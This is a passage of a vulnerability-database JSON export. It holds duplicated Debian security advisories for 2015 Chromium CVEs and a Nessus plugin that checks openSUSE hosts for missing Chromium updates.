Khalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256\n\n Atte Kettunen discovered a use-after-free issue in the SVG\n implementation.\n\nCVE-2015-1257\n\n miaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258\n\n cloudfuzzer discovered an invalid size parameter used in the\n libvpx library.\n\nCVE-2015-1259\n\n Atte Kettunen discovered an uninitialized memory issue in the\n pdfium library.\n\nCVE-2015-1260\n\n Khalil Zhani discovered multiple use-after-free issues in chromium's\n interface to the WebRTC library.\n\nCVE-2015-1261\n\n Juho Nurminen discovered a URL bar spoofing issue.\n\nCVE-2015-1262\n\n miaubiz discovered the use of an uninitialized class member in\n font handling.\n\nCVE-2015-1263\n\n Mike Ruddy discovered that downloading the spellcheck dictionary\n was not done over HTTPS.\n\nCVE-2015-1264\n\n K0r3Ph1L discovered a cross-site scripting issue that could be\n triggered by bookmarking a site.\n\nCVE-2015-1265\n\n The chrome 43 development team found and fixed various issues\n during internal auditing. Also multiple issues were fixed in\n the libv8 library, version 4.3.61.21.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-22T05:02:40", "type": "debian", "title": "[SECURITY] [DSA 3267-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-22T05:02:40", "id": "DEBIAN:DSA-3267-1:32EBE", "href": "https://lists.debian.org/debian-security-announce/2015/msg00158.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:56:55", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3267-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nMay 22, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1251 CVE-2015-1252 CVE-2015-1253 CVE-2015-1254\n CVE-2015-1255 CVE-2015-1256 CVE-2015-1257 CVE-2015-1258\n CVE-2015-1259 CVE-2015-1260 CVE-2015-1261 CVE-2015-1262\n CVE-2015-1263 CVE-2015-1264 CVE-2015-1265\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251\n\n SkyLined discovered a use-after-free issue in speech recognition.\n\nCVE-2015-1252\n\n An out-of-bounds write issue was discovered that could be used to\n escape from the sandbox.\n\nCVE-2015-1253\n\n A cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254\n\n A cross-origin bypass issue was discovered in the DOM editing feature.\n\nCVE-2015-1255\n\n Khalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256\n\n Atte Kettunen discovered a use-after-free issue in the SVG\n implementation.\n\nCVE-2015-1257\n\n miaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258\n\n cloudfuzzer discovered an invalid size parameter used in the\n libvpx library.\n\nCVE-2015-1259\n\n Atte Kettunen discovered an uninitialized memory issue in the\n pdfium library.\n\nCVE-2015-1260\n\n Khalil Zhani discovered multiple use-after-free issues in chromium's\n interface to the WebRTC library.\n\nCVE-2015-1261\n\n Juho Nurminen discovered a URL bar spoofing issue.\n\nCVE-2015-1262\n\n miaubiz discovered the use of an uninitialized class member in\n font handling.\n\nCVE-2015-1263\n\n Mike Ruddy discovered that downloading the spellcheck dictionary\n was not done over HTTPS.\n\nCVE-2015-1264\n\n K0r3Ph1L discovered a cross-site scripting issue that could be\n triggered by bookmarking a site.\n\nCVE-2015-1265\n\n The chrome 43 development team found and fixed various issues\n during internal auditing. Also multiple issues were fixed in\n the libv8 library, version 4.3.61.21.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-22T05:02:40", "type": "debian", "title": "[SECURITY] [DSA 3267-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-22T05:02:40", "id": "DEBIAN:DSA-3267-1:F1492", "href": "https://lists.debian.org/debian-security-announce/2015/msg00158.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-04T11:36:18", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3315-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nJuly 23, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1266 CVE-2015-1267 CVE-2015-1268 CVE-2015-1269\n CVE-2015-1270 CVE-2015-1271 CVE-2015-1272 CVE-2015-1273\n CVE-2015-1274 CVE-2015-1276 CVE-2015-1277 CVE-2015-1278\n CVE-2015-1279 CVE-2015-1280 CVE-2015-1281 CVE-2015-1282\n CVE-2015-1283 CVE-2015-1284 CVE-2015-1285 CVE-2015-1286\n CVE-2015-1287 CVE-2015-1288 CVE-2015-1289\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1266\n\n Intended access restrictions could be bypassed for certain URLs like\n chrome://gpu.\n\nCVE-2015-1267\n\n A way to bypass the Same Origin Policy was discovered.\n\nCVE-2015-1268\n\n Mariusz Mlynski also discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1269\n\n Mike Rudy discovered that hostnames were not properly compared in the\n HTTP Strict Transport Policy and HTTP Public Key Pinning features,\n which could allow those access restrictions to be bypassed.\n\nCVE-2015-1270\n\n Atte Kettunen discovered an uninitialized memory read in the ICU library.\n\nCVE-2015-1271\n\n cloudfuzzer discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1272\n\n Chamal de Silva discovered race conditions in the GPU process\n implementation.\n\nCVE-2015-1273\n\n makosoft discovered a buffer overflow in openjpeg, which is used by\n the pdfium library embedded in chromium.\n\nCVE-2015-1274\n\n andrewm.bpi discovered that the auto-open list allowed certain file\n types to be executed immediately after download.\n\nCVE-2015-1276\n\n Colin Payne discovered a use-after-free issue in the IndexedDB\n implementation.\n\nCVE-2015-1277\n\n SkyLined discovered a use-after-free issue in chromium's accessibility\n implementation.\n\nCVE-2015-1278\n\n Chamal de Silva discovered a way to use PDF documents to spoof a URL.\n\nCVE-2015-1279\n\n mlafon discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1280\n\n cloudfuzzer discovered a memory corruption issue in the SKIA library.\n\nCVE-2015-1281\n\n Masato Knugawa discovered a way to bypass the Content Security\n Policy.\n\nCVE-2015-1282\n\n Chamal de Silva discovered multiple use-after-free issues in the\n pdfium library.\n\nCVE-2015-1283\n\n Huzaifa Sidhpurwala discovered a buffer overflow in the expat\n library.\n\nCVE-2015-1284\n\n Atte Kettunen discovered that the maximum number of page frames\n was not correctly checked.\n\nCVE-2015-1285\n\n gazheyes discovered an information leak in the XSS auditor,\n which normally helps to prevent certain classes of cross-site\n scripting problems.\n\nCVE-2015-1286\n\n A cross-site scripting issue was discovered in the interface to\n the v8 javascript library.\n\nCVE-2015-1287\n\n filedescriptor discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1288\n\n Mike Ruddy discovered that the spellchecking dictionaries could\n still be downloaded over plain HTTP (related to CVE-2015-1263).\n\nCVE-2015-1289\n\n The chrome 44 development team found and fixed various issues\n during internal auditing.\n\nIn addition to the above issues, Google disabled the hotword extension\nby default in this version, which if enabled downloads files without\nthe user's intervention.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 44.0.2403.89-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 44.0.2403.89-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-07-24T12:29:48", "type": "debian", "title": "[SECURITY] [DSA 3315-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263", "CVE-2015-1266", "CVE-2015-1267", "CVE-2015-1268", "CVE-2015-1269", "CVE-2015-1270", "CVE-2015-1271", "CVE-2015-1272", "CVE-2015-1273", "CVE-2015-1274", "CVE-2015-1276", "CVE-2015-1277", "CVE-2015-1278", "CVE-2015-1279", "CVE-2015-1280", "CVE-2015-1281", "CVE-2015-1282", "CVE-2015-1283", "CVE-2015-1284", "CVE-2015-1285", "CVE-2015-1286", "CVE-2015-1287", "CVE-2015-1288", "CVE-2015-1289"], "modified": "2015-07-24T12:29:48", "id": "DEBIAN:DSA-3315-1:DF83F", "href": "https://lists.debian.org/debian-security-announce/2015/msg00211.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:52:03", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3315-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nJuly 23, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1266 CVE-2015-1267 CVE-2015-1268 CVE-2015-1269\n CVE-2015-1270 CVE-2015-1271 CVE-2015-1272 CVE-2015-1273\n CVE-2015-1274 CVE-2015-1276 CVE-2015-1277 CVE-2015-1278\n CVE-2015-1279 CVE-2015-1280 CVE-2015-1281 CVE-2015-1282\n CVE-2015-1283 CVE-2015-1284 CVE-2015-1285 CVE-2015-1286\n CVE-2015-1287 CVE-2015-1288 CVE-2015-1289\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1266\n\n Intended access restrictions could be bypassed for certain URLs like\n chrome://gpu.\n\nCVE-2015-1267\n\n A way to bypass the Same Origin Policy was discovered.\n\nCVE-2015-1268\n\n Mariusz Mlynski also discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1269\n\n Mike Rudy discovered that hostnames were not properly compared in the\n HTTP Strict Transport Policy and HTTP Public Key Pinning features,\n which could allow those access restrictions to be bypassed.\n\nCVE-2015-1270\n\n Atte Kettunen discovered an uninitialized memory read in the ICU library.\n\nCVE-2015-1271\n\n cloudfuzzer discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1272\n\n Chamal de Silva discovered race conditions in the GPU process\n implementation.\n\nCVE-2015-1273\n\n makosoft discovered a buffer overflow in openjpeg, which is used by\n the pdfium library embedded in chromium.\n\nCVE-2015-1274\n\n andrewm.bpi discovered that the auto-open list allowed certain file\n types to be executed immediately after download.\n\nCVE-2015-1276\n\n Colin Payne discovered a use-after-free issue in the IndexedDB\n implementation.\n\nCVE-2015-1277\n\n SkyLined discovered a use-after-free issue in chromium's accessibility\n implementation.\n\nCVE-2015-1278\n\n Chamal de Silva discovered a way to use PDF documents to spoof a URL.\n\nCVE-2015-1279\n\n mlafon discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1280\n\n cloudfuzzer discovered a memory corruption issue in the SKIA library.\n\nCVE-2015-1281\n\n Masato Knugawa discovered a way to bypass the Content Security\n Policy.\n\nCVE-2015-1282\n\n Chamal de Silva discovered multiple use-after-free issues in the\n pdfium library.\n\nCVE-2015-1283\n\n Huzaifa Sidhpurwala discovered a buffer overflow in the expat\n library.\n\nCVE-2015-1284\n\n Atte Kettunen discovered that the maximum number of page frames\n was not correctly checked.\n\nCVE-2015-1285\n\n gazheyes discovered an information leak in the XSS auditor,\n which normally helps to prevent certain classes of cross-site\n scripting problems.\n\nCVE-2015-1286\n\n A cross-site scripting issue was discovered in the interface to\n the v8 javascript library.\n\nCVE-2015-1287\n\n filedescriptor discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1288\n\n Mike Ruddy discovered that the spellchecking dictionaries could\n still be downloaded over plain HTTP (related to CVE-2015-1263).\n\nCVE-2015-1289\n\n The chrome 44 development team found and fixed various issues\n during internal auditing.\n\nIn addition to the above issues, Google disabled the hotword extension\nby default in this version, which if enabled downloads files without\nthe user's intervention.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 44.0.2403.89-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 44.0.2403.89-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-07-24T12:29:48", "type": "debian", "title": "[SECURITY] [DSA 3315-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263", "CVE-2015-1266", "CVE-2015-1267", "CVE-2015-1268", "CVE-2015-1269", "CVE-2015-1270", "CVE-2015-1271", "CVE-2015-1272", "CVE-2015-1273", "CVE-2015-1274", "CVE-2015-1276", "CVE-2015-1277", "CVE-2015-1278", "CVE-2015-1279", "CVE-2015-1280", "CVE-2015-1281", "CVE-2015-1282", "CVE-2015-1283", "CVE-2015-1284", "CVE-2015-1285", "CVE-2015-1286", "CVE-2015-1287", "CVE-2015-1288", "CVE-2015-1289"], "modified": "2015-07-24T12:29:48", "id": "DEBIAN:DSA-3315-1:9DB7E", "href": "https://lists.debian.org/debian-security-announce/2015/msg00211.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-12-05T15:06:48", "description": "Chromium was updated to 43.0.2357.65 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-1251: Use-after-free in Speech (boo#931659)\n\n - CVE-2015-1252: Sandbox escape in Chrome (boo#931671)\n\n - CVE-2015-1253: Cross-origin bypass in DOM (boo#931670)\n\n - CVE-2015-1254: Cross-origin bypass in Editing (boo#931669)\n\n - CVE-2015-1255: Use-after-free in WebAudio (boo#931674)\n\n - CVE-2015-1256: Use-after-free in SVG (boo#931664)\n\n - CVE-2015-1257: Container-overflow in SVG (boo#931665)\n\n - CVE-2015-1258: Negative-size parameter in Libvpx (boo#931666)\n\n - CVE-2015-1259: Uninitialized value in PDFium (boo#931667)\n\n - CVE-2015-1260: Use-after-free in WebRTC (boo#931668)\n\n - CVE-2015-1261: URL bar spoofing (boo#931673)\n\n - CVE-2015-1262: Uninitialized value in Blink (boo#931672)\n\n - CVE-2015-1263: Insecure download of spellcheck dictionary (boo#931663)\n\n - CVE-2015-1264: Cross-site scripting in bookmarks (boo#931661)\n\n - CVE-2015-1265: Various fixes from internal audits, fuzzing and other initiatives (boo#931660)\n\n - Multiple vulnerabilities in V8 fixed at the tip of the 4.3 branch (currently 4.3.61.21)", "cvss3": {}, "published": "2015-06-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2015-390)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo"], "id": "OPENSUSE-2015-390.NASL", "href": "https://www.tenable.com/plugins/nessus/83915", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-390.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83915);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2015-390)\");\n script_summary(english:\"Check for the openSUSE-2015-390 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 43.0.2357.65 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-1251: Use-after-free in Speech (boo#931659)\n\n - CVE-2015-1252: Sandbox escape in Chrome (boo#931671)\n\n - CVE-2015-1253: Cross-origin bypass in DOM (boo#931670)\n\n - CVE-2015-1254: Cross-origin bypass in Editing\n (boo#931669)\n\n - CVE-2015-1255: Use-after-free in WebAudio (boo#931674)\n\n - CVE-2015-1256: Use-after-free in SVG (boo#931664)\n\n - CVE-2015-1257: Container-overflow in SVG (boo#931665)\n\n - CVE-2015-1258: Negative-size parameter in Libvpx\n (boo#931666)\n\n - CVE-2015-1259: Uninitialized value in PDFium\n (boo#931667)\n\n - CVE-2015-1260: Use-after-free in WebRTC (boo#931668)\n\n - CVE-2015-1261: URL bar spoofing (boo#931673)\n\n - CVE-2015-1262: Uninitialized value in Blink (boo#931672)\n\n - CVE-2015-1263: Insecure download of spellcheck\n dictionary (boo#931663)\n\n - CVE-2015-1264: Cross-site scripting in bookmarks\n (boo#931661)\n\n - CVE-2015-1265: Various fixes from internal audits,\n fuzzing and other initiatives (boo#931660)\n\n - Multiple vulnerabilities in V8 fixed at the tip of the\n 4.3 branch (currently 4.3.61.21)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931668\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931672\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931674\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-43.0.2357.65-84.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-43.0.2357.65-29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-43.0.2357.65-29.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", 